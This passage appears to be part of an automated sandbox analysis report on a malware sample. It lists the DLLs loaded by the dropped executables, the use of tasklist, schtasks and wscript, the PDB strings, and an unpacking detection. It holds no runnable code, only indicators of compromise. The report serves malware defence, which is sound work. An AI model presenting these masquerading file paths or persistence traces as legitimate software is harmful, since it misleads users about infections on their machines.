                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: slc.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: sppc.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: onecorecommonproxystub.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                              Source: C:\Windows\SysWOW64\expand.exeSection loaded: cabinet.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dll
                              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dll
                              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dll
                              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dll
                              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dll
                              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dll
                              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dll
                              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dll
                              Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dll
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: ntmarta.dll
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: napinsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: pnrpnsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: wshbth.dll
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: nlaapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: winrnr.dll
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: rasadhlp.dll
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comSection loaded: apphelp.dll
                              Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: fswwa.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: winhttp.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: webio.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: schannel.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: mskeyprotect.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: ncryptsslp.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: gpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: dpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                              Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
                              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: d3d9.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: d3d10warp.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: resourcepolicyclient.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxcore.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: winhttp.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: webio.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: schannel.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: mskeyprotect.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: ncryptsslp.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: gpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: dpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: wbemcomn.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: amsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: duilib_u.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: vcruntime140.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: msvcp140.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: vcruntime140.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: dbghelp.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: pla.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: pdh.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: tdh.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: cabinet.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: wevtapi.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: winhttp.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                              Source: ybql.19.drLNK file: ..\..\..\..\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeWindow found: window name: TMainFormJump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: mQRr8Rkorf.exeStatic file information: File size 5719552 > 1048576
                              Source: mQRr8Rkorf.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x56c000
                              Source: mQRr8Rkorf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: mQRr8Rkorf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: mQRr8Rkorf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: mQRr8Rkorf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: mQRr8Rkorf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: mQRr8Rkorf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: mQRr8Rkorf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                              Source: mQRr8Rkorf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: wextract.pdb source: mQRr8Rkorf.exe, mQRr8Rkorf.exe, 00000000.00000000.872809030.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, A7B94.exe, A7B94.exe, 00000001.00000002.1214131092.0000000000921000.00000020.00000001.01000000.00000004.sdmp
                              Source: Binary string: E:\workdir\vc\rbin\RCClient\SplashWin.pdb,, source: HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1470296297.00000000009F3000.00000002.00000001.01000000.00000014.sdmp, SplashWin.exe, 00000011.00000000.1459370608.00000000009F3000.00000002.00000001.01000000.00000014.sdmp, SplashWin.exe, 00000012.00000002.1529025581.0000000000AD3000.00000002.00000001.01000000.00000018.sdmp, SplashWin.exe, 00000012.00000000.1468327716.0000000000AD3000.00000002.00000001.01000000.00000018.sdmp
                              Source: Binary string: wextract.pdbGCTL source: mQRr8Rkorf.exe, 00000000.00000000.872809030.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, A7B94.exe, 00000001.00000002.1214131092.0000000000921000.00000020.00000001.01000000.00000004.sdmp
                              Source: Binary string: E:\workdir\ProgramDatabase\DuiLib_u.pdbww3 source: HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1476151236.000000006D715000.00000002.00000001.01000000.00000015.sdmp, SplashWin.exe, 00000012.00000002.1540319838.000000006C605000.00000002.00000001.01000000.00000019.sdmp, SplashWin.exe, 00000030.00000002.1939527563.000000006C915000.00000002.00000001.01000000.00000019.sdmp
                              Source: Binary string: ntdll.pdb source: HmngBpR.exe, 00000010.00000002.1535870954.0000000006930000.00000004.00000800.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1514138504.0000000004D64000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: wntdll.pdbUGP source: SplashWin.exe, 00000011.00000002.1475323397.0000000009A30000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1475142879.00000000096D9000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1538393968.000000000A50C000.00000004.00000001.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1537077203.0000000009DF6000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1538039392.000000000A150000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740092927.000000000552E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740428427.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1917845908.000000000A1A7000.00000004.00000001.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1915903801.0000000009DF0000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1901427036.0000000009A93000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: ntdll.pdbUGP source: HmngBpR.exe, 00000010.00000002.1535870954.0000000006930000.00000004.00000800.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1514138504.0000000004D64000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: wntdll.pdb source: SplashWin.exe, 00000011.00000002.1475323397.0000000009A30000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1475142879.00000000096D9000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1538393968.000000000A50C000.00000004.00000001.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1537077203.0000000009DF6000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1538039392.000000000A150000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740092927.000000000552E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740428427.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1917845908.000000000A1A7000.00000004.00000001.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1915903801.0000000009DF0000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1901427036.0000000009A93000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: E:\workdir\ProgramDatabase\DuiLib_u.pdb source: HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1476151236.000000006D715000.00000002.00000001.01000000.00000015.sdmp, SplashWin.exe, 00000012.00000002.1540319838.000000006C605000.00000002.00000001.01000000.00000019.sdmp, SplashWin.exe, 00000030.00000002.1939527563.000000006C915000.00000002.00000001.01000000.00000019.sdmp
                              Source: Binary string: C:\Users\Admin\source\repos\Absolut\Absolut\obj\Release\Absolut.pdb source: pwHxMTy.exe, 0000002D.00000002.1939541599.0000000004209000.00000004.00000800.00020000.00000000.sdmp, pwHxMTy.exe, 0000002D.00000000.1699171423.0000000000FF2000.00000002.00000001.01000000.00000022.sdmp
                              Source: Binary string: E:\workdir\vc\rbin\RCClient\SplashWin.pdb source: HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1470296297.00000000009F3000.00000002.00000001.01000000.00000014.sdmp, SplashWin.exe, 00000011.00000000.1459370608.00000000009F3000.00000002.00000001.01000000.00000014.sdmp, SplashWin.exe, 00000012.00000002.1529025581.0000000000AD3000.00000002.00000001.01000000.00000018.sdmp, SplashWin.exe, 00000012.00000000.1468327716.0000000000AD3000.00000002.00000001.01000000.00000018.sdmp
                              Source: Binary string: D:\agent\_work\20\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1475931194.000000006D681000.00000020.00000001.01000000.00000016.sdmp, SplashWin.exe, 00000011.00000003.1467481979.0000000000713000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1541298389.000000006CF71000.00000020.00000001.01000000.0000001A.sdmp
                              Source: Binary string: D:\agent\_work\20\s\\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, SplashWin.exe, 00000011.00000002.1475681626.000000006D601000.00000020.00000001.01000000.00000017.sdmp, SplashWin.exe, 00000012.00000002.1540622430.000000006CDA1000.00000020.00000001.01000000.0000001B.sdmp, SplashWin.exe, 00000030.00000002.1941370087.000000006CF11000.00000020.00000001.01000000.0000001B.sdmp

                              Data Obfuscation

                              barindex
                              Detected unpacking (changes PE section rights)
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeUnpacked PE file: 2.2.1E08u3.exe.490000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ezfgyvbn:EW;ajpekoqk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ezfgyvbn:EW;ajpekoqk:EW;.taggant:EW;
